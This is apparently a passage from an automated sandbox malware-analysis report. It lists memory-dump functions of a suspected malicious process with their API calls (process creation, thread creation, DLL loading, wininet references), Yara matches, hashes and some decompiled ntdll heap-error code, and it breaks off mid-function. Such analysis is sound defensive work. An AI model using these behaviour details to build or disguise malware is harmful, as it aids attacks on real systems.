Instruction Fuzzy Hash: 7590027120100407F501659954086560026D7E4345F51D011A9015566ECAA5D8D17171

Uniqueness

Uniqueness Score: -1.00%

Function 04D49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4991A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
Instruction ID: 62360b0bd933b0bfb8432f1b2ed6a2c1c6b37e2c27357c0785e89671665d5c43
Opcode Fuzzy Hash: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
Instruction Fuzzy Hash: D29002B120100407F541715944047560026D7D4345F51C011A9055565E8A99DDD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A56ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00A56F78

Strings

wininet.dll, xrefs: 00A56F2E, 00A56F37
net.dll, xrefs: 00A56F41, 00A56FC7, 00A56F9F, 00A56FAB, 00A56FD3

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
Instruction ID: bc067fa41df99d93da1185397cd40cce8b5a85e18d73245bdfd57048dd1603ec
Opcode Fuzzy Hash: d587dad9b02e6da53202134dba226773cf49988327008f2b2850a1930fd7bfae
Instruction Fuzzy Hash: 613181B5601704ABC715DF68D9A1FA7B7F8FB88700F40841DFA1A9B241D730B949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A56EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00A56F78

Strings

wininet.dll, xrefs: 00A56F2E, 00A56F37
net.dll, xrefs: 00A56F41, 00A56F9F, 00A56FAB

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: ee6bf49ee07ab8f3c181f06646a936d903699263e1cfb984f0dea38ee53b3ea1
Instruction ID: be358108ee0c222ea0bc2bd1adc5ecdaf09417749aff263be1db2af21e832738
Opcode Fuzzy Hash: ee6bf49ee07ab8f3c181f06646a936d903699263e1cfb984f0dea38ee53b3ea1
Instruction Fuzzy Hash: 6631D8B1A01704ABD711DF68D9A1F9BBBF4FF84704F50815DF9195B242D370A949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A584B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A43B93), ref: 00A584ED

Strings

.z`, xrefs: 00A584DC, 00A584E8

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction ID: 3cff5af5522369a2a772f535d3224b946f57099dfe4eb38493fdd8f51b91c656
Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction Fuzzy Hash: 09E092B2200304BBEB14DF64CC49EA737ACAF88750F114199FE086B382D531E901CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A584C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A43B93), ref: 00A584ED

Strings

.z`, xrefs: 00A584DC, 00A584E8

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 7f8e3743ec4009fb557e9d5937dde4ad9c171b06d93616aa0174b6f4b21ba06a
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 70E01AB12002046BDB14DF59CC45EA777ACAF88750F014554BE0857241CA30E9148AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A47260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A472BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A472DB

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: ed440f0be470916d666934226f335dbca75037cd9dc9a33b151f131146a874d3
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: DD01A732A803287AEB21A6949D03FFF776C6B40B51F144115FF04BA1C2E7E4690A86F5

Uniqueness

Uniqueness Score: -1.00%

Function 00A5852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A58584

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction ID: 90006d8ad5c55da1b81de95fbd539d9c133381dea957b380672a9ee4fff50ce4
Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction Fuzzy Hash: B911C5B2204108BBCB14DF99DC80DEB77ADAF8C754F158259FE4DA7241DA34E9158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A49B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A49B82

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 52c37ca3c3d6d4d3574efa847f4787b4148ff97756be6d6f65e28a38af1b7496
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: AB0112B5E4010DA7DF10DBE4DD42F9EB778AB54309F004295ED0897141F631EB19CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A58447, Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00A53506,?,00A53C7F,00A53C7F,?,00A53506,?,?,?,?,?,00000000,00000000,?), ref: 00A584AD

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction ID: e36248ed19c72582f028a79318d9cbfadcc323eb824978c8a443258b6454dbf1
Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction Fuzzy Hash: 7FF062763102156FDB24EF98EC84EE7736DEF88361B108559FE4C9B201C931EA158BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A58530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A58584

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: abb9a8133316e952dbbc0ee4bce8631a2238e700e0fa1af86ea14243d3a30416
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: AE01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A56FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A4CCC0,?,?), ref: 00A5703C

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction ID: 4df3d49821c11f3983e4176af5fd66b1ebbb1bd56c284639963ab0d5ec0675a8
Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction Fuzzy Hash: 92F0E5722402103BD7302648DC03FEB7298EB95B51F240019FA4AAB2C1C9A5B90646E5

Uniqueness

Uniqueness Score: -1.00%

Function 00A57000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A4CCC0,?,?), ref: 00A5703C

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: 757adc8721bbb125c417a8819ebe50351dc651915222a204e14972455daaab94
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 9DE092333803143AE7306599AC03FABB3DCEB81B61F140026FE0DEB2C1D5A5F90542A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A58480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00A53506,?,00A53C7F,00A53C7F,?,00A53506,?,?,?,?,?,00000000,00000000,?), ref: 00A584AD

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8451ce342b014cef2253d2039ee9bc427ae65540f3f7270cf0b61eed94dfd924
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: FBE01AB1200204ABDB14DF59CC41EA777ACAF88650F114558BE085B241C930F9148AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A58620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00A4CF92,00A4CF92,?,00000000,?,?), ref: 00A58650

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: c216fd80f3645b1a2261a29949d520c4ed694b0efcc5ec0c94b548b70adf3739
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 8BE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BE0867241C934E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00A47C63,?), ref: 00A4D42B

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 2d1477bc0169f553ecf95ea1c853a5e655708b70227e7010d5918f79db9dbdec
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: BAD0A7767903043BEA10FBA49C03F2632CDAB84B40F494064FD49D73C3D960F5004161

Uniqueness

Uniqueness Score: -1.00%

Function 04D4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D49694

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
Instruction ID: 5dca91d77a543308ac1bf4a577ff8edc305f5515e7528dbb4a69d2b1bae381ff
Opcode Fuzzy Hash: 34b3f4b543aabe683cf697c05f51c67298d791ead2c1b6e3534cba8e176b3a9c
Instruction Fuzzy Hash: 02B09BB19424C5CBFB51D77146087277911B7D4745F16C055D1420651A4778D0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04DBB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 04DBB51C
*** Inpage error in %ws:%s, xrefs: 04DBB418
write to, xrefs: 04DBB4A6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04DBB476
a NULL pointer, xrefs: 04DBB4E0
Go determine why that thread has not released the critical section., xrefs: 04DBB3C5
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04DBB2DC
*** An Access Violation occurred in %ws:%s, xrefs: 04DBB48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04DBB484
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 04DBB39B
The resource is owned shared by %d threads, xrefs: 04DBB37E
The instruction at %p tried to %s , xrefs: 04DBB4B6
<unknown>, xrefs: 04DBB27E, 04DBB2D1, 04DBB350, 04DBB399, 04DBB417, 04DBB48E
an invalid address, %p, xrefs: 04DBB4CF
*** enter .exr %p for the exception record, xrefs: 04DBB4F1
*** Resource timeout (%p) in %ws:%s, xrefs: 04DBB352
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04DBB314
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04DBB47D
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04DBB305
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04DBB53F
The critical section is owned by thread %p., xrefs: 04DBB3B9
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04DBB323
The resource is owned exclusively by thread %p, xrefs: 04DBB374
The instruction at %p referenced memory at %p., xrefs: 04DBB432
This failed because of error %Ix., xrefs: 04DBB446
*** enter .cxr %p for the context, xrefs: 04DBB50D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB3D6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04DBB38F
*** A stack buffer overrun occurred in %ws:%s, xrefs: 04DBB2F3
read from, xrefs: 04DBB4AD, 04DBB4B2

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
Instruction ID: 02c95c867868287dcd41dde3dbb892e87cafa40dc1d4018ca80a036e2cee084a
Opcode Fuzzy Hash: 3c63c90b91982bbcba54d4872e5704ec8e48cce95b1f3f8a0a8fdc3607ed2c50
Instruction Fuzzy Hash: 2E813432B00200FFEF265E05DC45EAB3B67FF46759B404066F2475B612E269B901DAB2

Uniqueness

Uniqueness Score: -1.00%

Function 04DC1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04DC1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4ce48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4df589c);
				E04D0B150("Heap error detected at %p (heap handle %p)\n",  *0x4df58a0);
				_t27 =  *0x4df5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04DC1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04D0B150("Error code: %d - %s\n",  *0x4df5898);
				_t113 =  *0x4df58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter1: %p\n",  *0x4df58a4);
				}
				_t115 =  *0x4df58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter2: %p\n",  *0x4df58a8);
				}
				_t117 =  *0x4df58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D0B150("Parameter3: %p\n",  *0x4df58ac);
				}
				_t119 =  *0x4df58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D0B150();
					} else {
						E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4df58b4);
					E04D0B150("Last known valid blocks: before - %p, after - %p\n",  *0x4df58b0);
				} else {
					_t120 =  *0x4df58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D0B150();
				} else {
					E04D0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04D0B150("Stack trace available at %p\n", 0x4df58c0);
			}

0x04dc1c10
0x04dc1c16
0x04dc1c1e
0x04dc1c3d
0x04dc1c3e
0x04dc1c20
0x04dc1c35
0x04dc1c3a
0x04dc1c44
0x04dc1c55
0x04dc1c5a
0x04dc1c65
0x04dc1c67
0x00000000
0x04dc1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04dc1c67
0x04dc1cdc
0x04dc1ce5
0x04dc1d04
0x04dc1d05
0x04dc1ce7
0x04dc1cfc
0x04dc1d01
0x04dc1d0b
0x04dc1d17
0x04dc1d1f
0x04dc1d25
0x04dc1d30
0x04dc1d4f
0x04dc1d50
0x04dc1d32
0x04dc1d47
0x04dc1d4c
0x04dc1d61
0x04dc1d67
0x04dc1d68
0x04dc1d6e
0x04dc1d79
0x04dc1d98
0x04dc1d99
0x04dc1d7b
0x04dc1d90
0x04dc1d95
0x04dc1daa
0x04dc1db0
0x04dc1db1
0x04dc1db7
0x04dc1dc2
0x04dc1de1
0x04dc1de2
0x04dc1dc4
0x04dc1dd9
0x04dc1dde
0x04dc1df3
0x04dc1df9
0x04dc1dfa
0x04dc1e00
0x04dc1e0a
0x04dc1e13
0x04dc1e32
0x04dc1e33
0x04dc1e15
0x04dc1e2a
0x04dc1e2f
0x04dc1e39
0x04dc1e4a
0x04dc1e02
0x04dc1e02
0x04dc1e08
0x00000000
0x00000000
0x04dc1e08
0x04dc1e5b
0x04dc1e7a
0x04dc1e7b
0x04dc1e5d
0x04dc1e72
0x04dc1e77
0x04dc1e95

Strings

heap_failure_block_not_busy, xrefs: 04DC1CA6
heap_failure_listentry_corruption, xrefs: 04DC1CD0
Parameter2: %p, xrefs: 04DC1DA5
HEAP[%wZ]: , xrefs: 04DC1C30, 04DC1CF7, 04DC1D42, 04DC1D8B, 04DC1DD4, 04DC1E25, 04DC1E6D
Stack trace available at %p, xrefs: 04DC1E86
heap_failure_usage_after_free, xrefs: 04DC1CBB
heap_failure_entry_corruption, xrefs: 04DC1C83
Error code: %d - %s, xrefs: 04DC1D12
heap_failure_buffer_overrun, xrefs: 04DC1C98
heap_failure_internal, xrefs: 04DC1C6E
heap_failure_lfh_bitmap_mismatch, xrefs: 04DC1CD7
heap_failure_invalid_argument, xrefs: 04DC1CAD
Last known valid blocks: before - %p, after - %p, xrefs: 04DC1E45
Parameter1: %p, xrefs: 04DC1D5C
heap_failure_cross_heap_operation, xrefs: 04DC1CC2
heap_failure_multiple_entries_corruption, xrefs: 04DC1C8A
heap_failure_buffer_underrun, xrefs: 04DC1C9F
HEAP: , xrefs: 04DC1C16, 04DC1C3D, 04DC1D04, 04DC1D4F, 04DC1D98, 04DC1DE1, 04DC1E32, 04DC1E7A
Parameter3: %p, xrefs: 04DC1DEE
heap_failure_unknown, xrefs: 04DC1C75
heap_failure_generic, xrefs: 04DC1C7C
Heap error detected at %p (heap handle %p), xrefs: 04DC1C50
heap_failure_freelists_corruption, xrefs: 04DC1CC9
heap_failure_virtual_block_corruption, xrefs: 04DC1C91
heap_failure_invalid_allocation_type, xrefs: 04DC1CB4

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
Instruction ID: 81ed5142526ed196d29a92310fc4e0f779090bee9b7dae006091a092e8ef56a6
Opcode Fuzzy Hash: b3cbaa4e134dcda0101d6cbe7859bd057a589fb46931cce6f18bacce83d35eef
Instruction Fuzzy Hash: 7461C432714166EFE351AB85D995A38B3E6EB04A30B49807EF50D5B352D638FC409E2A

Uniqueness

Uniqueness Score: -1.00%

Function 04D2B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04D2B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4dfd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
